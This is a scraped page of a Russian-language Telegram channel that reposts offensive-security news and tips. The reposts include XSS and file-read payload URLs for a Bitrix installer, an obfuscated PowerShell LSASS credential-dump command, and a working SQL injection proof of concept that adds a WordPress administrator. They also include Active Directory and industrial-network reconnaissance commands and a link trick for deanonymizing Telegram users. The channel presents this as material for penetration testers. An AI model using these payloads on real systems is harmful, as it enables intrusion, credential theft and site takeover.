Pentester's Backlog
588 subscribers
309 photos
15 videos
44 files
424 links
Агрегатор новостей из мира наступательной безопасности.

EDUCATIONAL PURPOSES ONLY
Download Telegram
Forwarded from Purple Chronicles (ELK Enjoyer)
Forwarded from SecurityLab.ru
Критическая брешь в HTTP/2: CONTINUATION Flood приводит к мощнейшим DoS-атакам

🔒 Исследователь в области кибербезопасности Бартек Новотарски обнаружил уязвимость в протоколе HTTP/2, получившую название «HTTP/2 CONTINUATION Flood». ‍

🥷 Злоумышленник может использовать эту уязвимость для DoS-атаки, отправив бесконечный поток заголовков, что приведет к переполнению памяти сервера и его аварийному завершению работы.

💡Брешь затрагивает множество популярных проектов, таких как Apache HTTP Server, Apache Tomcat, Golang и Node.js. В качестве временного решения рекомендуется отключить поддержку HTTP/2 на сервере, до применения обновления, чтобы избежать потенциальных атак.

#CyberSecurity #HTTP2Vulnerability #DoSAttack @SecLabNews
Please open Telegram to view this post
VIEW IN TELEGRAM
🤯1
Forwarded from SHADOW:Group
😱 Уязвимости в установщике Битрикс

Для установки Битрикса есть скрипт bitrixsetup.php, который разработчики рекомендуют удалять после установки, но, как выяснилось, не все это делают. При обнаружении этого скрипта основной вектор атаки, который приходит в голову, это переустановить CMS и загрузить веб-шелл через административную панель.

Иногда админы просто ограничивают права на запись в директорию и считают, что этого будет достаточно, однако данный скрипт сам по себе оказался уязвим к XSS и LFR:

XSS:
https://target.com/bitrixsetup.php?action=UNPACK&filename=<img src='' onerror=alert(document.domain)>

LFR:
https://target.com/bitrixsetup.php?action=UNPACK&filename=../../../../etc/passwd 


Более подробно читайте в статье на хабре.

#web #bitrix #xss #lfr
Please open Telegram to view this post
VIEW IN TELEGRAM
1
Forwarded from PT SWARM
🏭 We've tested the new RCE in Microsoft Outlook (CVE-2024-21378) in a production environment and confirm it works well!

A brief instruction for red teams:

1. Compile our enhanced DLL;
2. Use NetSPI's ruler and wait!

No back connect required!

🔥 📐📏
🔥1
Forwarded from Ralf Hacker Channel (Ralf Hacker)
Ой, красота))) Получить данные из LSA без дампа LSASS.

Historically was able to (and may presently still) bypass:
* Windows Defender
* Malwarebytes Anti-Malware
* CrowdStrike Falcon EDR (Falcon Complete + OverWatch)


Tool: https://github.com/Meowmycks/LetMeowIn?tab=readme-ov-file

Blog: https://posts.specterops.io/lsa-whisperer-20874277ea3b

#redteam #pentest #creds #dump
Obfuscated LSASS dumper command

&$env:???t??r???\*2\r[t-u]???[k-l]?2* $(gi $env:???t??r???\*2\c?m?[v-w]*l | % {
$_.FullName }), `#-999999999999999999999999999999999999999999999999999999999999
999999999999999999999999999999999999999999999999999999999999999999999999999999
999999999999999999999999999999999999999999999999999999999999999999999999999999
99999999999999999976-decoy $(gps l?a*s).id c:\t??p\dmp.log full;


😨 Подробнее, почему такое вообще возможно
2🥴1
Forwarded from RedTeam brazzers (Миша)
Иногда для реализации самых интересных векторов атак и осуществления умопомрачительных бизнес-целей требуется найти сегмент с АСУ ТП (привет пхд :) ). Есть несколько разных подходов:

- Можно пробовать обнаружить устройства с несколькими сетевыми интерфейсами. Ведь админ может взять и пробросить себе доступ куда не следует. Здесь, при отсутствии учетных данных, можно использовать NetBIOS , DNS, broadcast-igmp-discovery, IOXIDResolver . При наличии кредов от ДА можно обратить внимание на Powershell:
Invoke-Command -ComputerName $(Get-Content comps.txt) -ScriptBlock {ipconfig}


- Можно просто осуществлять поиск подсетей, извлекая их как с DC (Спасибо Димону Неверову) dsquery subnet , так и через рекурсивное хождение на машины: CornerShot , TrustMeter . Подобный функционал есть и в ldeep :
sudo ldeep ldap -u reguser -p 'Password123' -d domain.ltd -s ldap://192.168.0.147 subnets

Никто не запрещает и сдампить ADIDNS или обратиться к скриптам по типу tracebuster.py

- Помимо всего, иногда попадаются на глаза различные интересные службы — тот же SNMP. Или веб-админка какая-нибудь торчит. В таком случае на помощь придет httpx и aquatone
./httpx -l hosts.txt -silent -o res.txt [-http-proxy socks5://127.0.0.1:1337]
cat res.txt | ./aquatone [-proxy socks5://127.0.0.1:1337]


Тем не менее, основным мотивом поста стал инструмент Redpoint, нацеленный специально на АСУ ТП устройства. Репозиторий содержит в себе различные .nse скрипты для обнаружения подобных девайсов.

    BACnet-discover-enumerate.nse - Identify and enumerate BACnet devices

codesys-v2-discover.nse - Identify and enumerate CoDeSys V2 controllers

enip-enumerate.nse - Identify and enumerate EtherNet/IP devices from Rockwell Automation and other vendors

fox-info.nse - Identify and enumerate Niagara Fox devices

modicon-info.nse - Identify and enumerate Schneider Electric Modicon PLCs

omron-info.nse - Identify and enumerate Omron PLCs

pcworx-info.nse - Identify and enumerate PC Worx Protocol enabled PLCs

proconos-info.nse - Identify and enumerate ProConOS enabled PLCs

s7-enumerate.nse - Identify and enumerate Siemens SIMATIC S7 PLCs


В связи с чем, можно с уверенностью говорить, что не один завод не устоит перед нами))))

Главное не перетрудиться, чтобы не случилась ситуация из мема 😃
Forwarded from b␢code
✈️ В версии Telegram Desktop 4.16.6 добавили поддержку ссылок вида t.me/username?text=Hello для вставки заготовленного текста в поле ввода сообщения.

Нашел этому очень интересное применение, можно деанонить людей которые кликнули на ссылку. Вот пример ссылки. Если вы просто нажмете на него, мне придет уведомление что вы перешли

Так же сделал телеграм бота для создания таких ссылок: @inlinequery_bot
🐙 https://github.com/marwq/telegram-deanon
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from Path Secure (CuriV)
Привет!

Я проводил множество собесов для админов и пентестеров, менторил несколько человек по разным аспектам наступательной информационной безопасности, сам участвовал в собесах. Мне нравится как разные вопросы позволяют пролить свет на глубину знаний человека в той или иной области.

Решил создать и курировать репозиторий с вопросами по наступательной безопасности на русском языке. Почему-то я не нашел такой репозиторий сразу. На английском языке таких огромное колличество и все они имею свои плюсы и минусы.

Этот репозиторий содержит в себе компиляцию вопросов по наступательной безопасности (offensive security). Используя этот материал, можно подготовиться к предстоящему собеседованию или прикинуть какие области знаний Вами не покрыты для самостоятельного обучения. Хороший интервьюер всегда задаст более глубокий и уточняющий вопрос, а соискателю будет невероятно полезно осознавать что еще ему стоит подучить или хотя бы иметь ввиду.

Проект является личной инициативой и несет в себе исключительно альтруистические цели. Проект является открытым, каждый желающий может сделать форк или предложить изменения в существующий список вопросов мне в личку в телеге (@curiv). Порядок вопросов и их категория носят субъективный характер. Репозиторий будет наполняться с течением времени, список источников представлен в последнем разделе. Вопросы будут агрегироваться из источников, список источников также будет пополняться. Если оставите положительные реакции, то мне будет приятно ❤️

https://github.com/curiv/russian-offensive-security-questions

#pentest #interview #repository
👍1
Forwarded from 1N73LL1G3NC3
👩‍💻 PoC for WordPress Automatic Plugin CVE-2024-27956 (Unauthenticated Arbitrary SQL Execution) (CVSS 9.9)

Since "q" is passed directly into a $wpdb->get_results() call, you can execute SQL commands directly.

Adding a new WordPress user:
q=INSERT INTO wp_users (user_login, user_pass, user_nicename, user_email, user_registered, user_status) VALUES ('poc', MD5('poc'), 'poc', 'poc@localhost.org', NOW(), 0);&auth=%20&integ=5be638728303f002fd54450e5866dd28


Giving the user admin rights:
q=INSERT INTO wp_usermeta (user_id, meta_key, meta_value) VALUES (6, 'wp_capabilities', 'a:1:{s:13:"administrator";b:1;}'), (6, 'wp_user_level', '10');&auth=%20&integ=6ed26ea278413ec91e2c27fed01eac6c


PWNED!

Note: Param "integ" is the md5sum of the query.

6K+ Services are found: https://hunter.how/list?searchValue=web.body%3D%22wp-content%2Fplugins%2Fwp-automatic%22

Tweet: https://x.com/mrtuxracer/status/1784229071460692232?s=12
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
👍1
Forwarded from Волосатый бублик
#adcs #bloodhound #ad

[ ADCS Attack Paths in BloodHound ]

This blog post(s) details the domain escalation requirements and explains how BloodHound incorporates the relevant components. SpectrOps team will demonstrate how to effectively use BloodHound to identify attack paths that involve ESC abuse.

Part 1


Part 2
👍1